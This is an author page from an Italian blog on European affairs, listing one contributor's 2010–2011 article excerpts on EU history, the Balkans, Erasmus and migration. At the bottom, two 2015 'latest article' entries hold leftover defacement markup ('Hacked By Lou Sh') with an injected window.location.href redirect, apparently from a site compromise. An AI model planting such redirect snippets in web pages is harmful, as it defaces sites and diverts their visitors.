EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010

Paolo Massimetti


Laureato del corso di laurea in Scienze della Comunicazione, Facoltà di Lettere e Filosofia, Università di Roma Tor Vergata.

ses articles
Barack Obama come John Fitzgerald Kennedy. Dopo quarantacinque anni, un presidente Americano torna a riscaldare il cuore dell’Europa. Sebbene i rapporti bilaterali tra USA ed Europa siano sempre proseguiti su un livello di cooperazione, con la (...)
29 aprile 2010
E’ a partire dal 1993, con la fondazione del Dipartimento “Roma and Travellers” nato a Strasburgo nell’ambito del Consiglio d’Europa, che viene posta all’attenzione dell’opinione pubblica europea la questione rom: cioè quella serie di gruppi gitani che (...)
15 ottobre 2010
L’area geografica dell’Europa sud orientale che, partendo dalle porte di Trieste, si estende fino a quelle di Salonicco è definita penisola balcanica, e rimane per molti, ancora oggi, nella sua struttura storica e umana, una zona grigia priva di (...)
25 ottobre 2010
Nell’immediato dopoguerra, quando trovare qualcosa da mangiare era il principale problema quotidiano, i paesi membri della Comunità europea adottarono ogni sorta di programma per assistere e incoraggiare agricoltori e allevatori a produrre di più. (...)
2 novembre 2010
Dal 1945 sino all’inizio del 1953 l’Europa occidentale visse sotto la pesante ombra della guerra e nella previsione angosciosa di un’altra. Ciononostante, con la morte di Stalin e la fine della guerra in Corea, l’Europa entrò in un periodo di (...)
8 novembre 2010
Il primo piano concreto per l’integrazione economica europea, cioè l’iniziativa del Benelux, che era rivolta all’Olanda e al Lussemburgo, ma che in origine avrebbe dovuto coinvolgere anche la Francia, ebbe inizio con la convezione doganale di Londra (...)
12 novembre 2010
Il progetto European Region Action Scheme for the Mobility of University Students, meglio conosciuto con l’acronimo Erasmus, nasce nel 1987 per opera della Comunità Europea e sancisce la possibilità di uno studente universitario “europeo” di (...)
19 novembre 2010
Dal 4 aprile 1949, il mondo, o almeno la sua zona occidentale, è più sicura. In quel giorno piovigginoso di Brussels, i diversi capi di stato e presidenti del consiglio europeo e nord-americani riportarono un po’ di sole nell’Europa devastata dal (...)
25 novembre 2010
Nel gennaio del 1997, undici mesi prima della ratifica del Protocollo di Kyoto, un trattato nato per far fronte alle trasformazioni climatiche, il mondo intero e gli stati membri dell’Unione Europea furono richiamati da diversi metereologi e (...)
30 novembre 2010
“La tempesta finanziaria non è ancora finita e i suoi effetti sull’economia stanno diventando evidenti nella forma di un indebolimento dell’attività e un aumento della disoccupazione, cui va aggiunto il balzo dell’inflazione. Il risultato è uno degli (...)
2 dicembre 2010
Era dal lontano ottobre 1962 che il mondo diplomatico non subiva un “terremoto” politico e istituzionale internazionale. In quel periodo, in piena guerra fredda, a scuotere l’Occidente furono le basi missilistiche sovietiche installate a Cuba, (...)
9 dicembre 2010
“Ogni individuo ha diritto alla libertà di pensiero, di coscienza e di religione. Tale diritto include la libertà di cambiare religione o convinzione, così come la libertà di manifestare la propria religione o la propria convinzione individualmente o (...)
20 dicembre 2010
L’Organizzazione per la Cooperazione e lo Sviluppo Economico è un organismo internazionale con sede in Francia, a Parigi, che ha come obiettivo lo studio del sistema economico e democratico dei paesi membri. L’organizzazione nacque nell’immediato (...)
5 gennaio 2011
Il 2011 incomincia per l’Unione Europea all’insegna della libertà religiosa. Il diritto umano di poter professare il proprio credo è sempre stato legato alle vicende del Vecchio Continente, diventando uno dei valori fondanti della democrazia (...)
13 gennaio 2011
Vento gelido spira dal sud-est dell’Europa. L’Albania, il Paese delle aquile, dal giugno 2009 sta attraversando una profonda crisi economica e politica, improvvisamente degenerata in violenti scontri di piazza avvenuti nella capitale, Tirana, il (...)
27 gennaio 2011
“L’adesione della Serbia e dei Balcani occidentali all’Unione Europea è un forte interesse strategico non solo per Belgrado, ma anche per la stessa Europa”. Queste sono le parole di Franco Frattini, Ministro degli Esteri italiano, rilasciate in un (...)
10 febbraio 2011
Qui si fa "l’Europa" o si muore. Il motto, reinterpretato, con cui Giuseppe Garibaldi vinse la battaglia di Calatafimi nel 1860, sembra risuonare lungo i corridoi di Palazzo Koch, sede centrale della Banca d’Italia a Roma. Nelle celebrazioni per (...)
17 febbraio 2011
“Che cosa è il Mediterraneo? Mille cose al tempo stesso. Non un paesaggio, ma innumerevoli paesaggi. Non un mare ma una successione di mari. Non una civiltà ma più civiltà ammassate l’una sull’altra. Il Mediterraneo è un antico crocevia. Da millenni (...)
24 febbraio 2011
“Se ho scelto Dublino per scena è perché quella città mi appariva come il centro della paralisi”. Nel 1906, lo scrittore irlandese James Joyce, profondo conoscitore delle tradizioni dei dubliners, aveva già capito quali sarebbero state le sorti future (...)
3 marzo 2011
La donna è un mistero. Capirla, comprenderla, significherebbe già ridurla della propria essenza. Afferrarla, possederla, sarebbe di per se un delitto. Il suo fascino, la sua bellezza sono un enigma che si svela lentamente. Una creatura (...)
11 marzo 2011
“Le grandi divisioni dell’umanità e la fonte di conflitto principale saranno legate alla cultura. Gli Stati nazionali rimarranno gli attori principali nel contesto mondiale, ma i conflitti più importanti avranno luogo tra nazioni e gruppi di diverse (...)
31 marzo 2011
“Siamo in un’epoca in cui le catene non sono portate ai piedi, ma alla motilità delle prime origini del nostro io e della nostra vita. Anche se apparentemente con altri sistemi, o meglio, con altri sistemi dal punto di vista dell’apparenza, (...)
6 aprile 2011
The best is yet to come. Il meglio deve ancora venire. Siamo arrivati a circa un mese dall’inizio degli sbarchi dei migranti provenienti dal Nord Africa in rivolta e l’Europa comincia a dar segni di vivo interesse circa questo fenomeno. Tra (...)
18 aprile 2011
Cina. Italia. G-20. Tre parole che rievocano scenari da guerra fredda. Molto è trascorso da quel periodo, in cui gli intrecci politici nel mondo comunista facevamo tremare la coscienza occidentale e le relazioni con il “mondo capitalista” erano (...)
22 aprile 2011
“Nella corsa alla ricchezza, agli onori e all’ascesa sociale, ognuno può correre con tutte le proprie forze per superare tutti gli altri concorrenti. Ma se si facesse strada a gomitate o spingesse per terra uno dei suoi avversari, l’indulgenza (...)
2 maggio 2011
“Questo è un bel giorno per l’America. Il nostro paese ha mantenuto il proprio impegno di veder fatta giustizia. Il mondo è più sicuro, è un posto migliore dopo la morte di Osama bin Laden”
3 maggio 2011
“Il capo supremo deve essere giusto per se stesso e tuttavia essere un uomo. Da un legno storto come’è quello di cui l’uomo è fatto non può uscire nulla di interamente diritto”
19 maggio 2011
“A questo cimitero di vittime della crudeltà umana nel nostro secolo si aggiunge ancora un altro grande cimitero: il cimitero dei non nati, cimitero degli indifesi, di cui perfino la propria madre non conobbe il volto, acconsentendo, oppure (...)
25 maggio 2011
“Dicono che il Giappone sia nato da una spada. Dicono che gli antichi dei hanno immerso una lama di corallo nell’oceano e che, al momento di estrarla, quattro gocce perfette siano cadute in mare e che quelle gocce siano diventate le isole del (...)
31 maggio 2011
“Io penso che la maggioranza dei croati pensi sostanzialmente con grande gioia al momento in cui si unirà alla Unione europea perché è un popolo profondamente europeo, i croati hanno detto sempre: noi siamo la Mitteleuropa, e quindi è un popolo che (...)
13 giugno 2011
"Dobbiamo avere cura dell’ambiente: esso è stato affidato all’uomo, perché lo custodisca e lo coltivi con libertà responsabile, avendo sempre come criterio orientatore il bene di tutti".
21 giugno 2011
“La legge ha da essere morale e moralizzante, non solo per giustizia, ma per utilità, per conseguire quella prevenzione, che non si consegue senza buoni esempi”.
30 giugno 2011

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France